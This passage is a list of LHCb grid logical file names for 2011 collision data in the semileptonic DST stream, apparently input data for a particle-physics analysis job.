'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024240_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049223_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044654_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003176_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008646_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008320_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063442_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058370_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017680_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009436_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016451_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064238_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052066_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013165_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057309_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007869_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008600_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051043_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009334_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024066_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062956_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010158_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056642_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060482_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031494_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039365_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008227_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022579_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024130_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044663_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069287_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059446_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001936_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061504_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019385_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043511_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001646_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028351_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019599_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054661_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058131_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042791_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057490_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056416_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041085_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031795_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000741_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049683_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025099_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050929_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047840_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060761_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025454_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027755_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000430_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039648_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043482_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059330_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004109_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047815_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063854_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048146_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050743_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054731_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017278_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009419_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024365_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044188_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060075_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042654_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035136_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028508_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038762_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000402_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017280_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027544_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011108_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007121_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059825_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041687_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003268_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008601_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018620_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055168_1.semileptonic.dst',
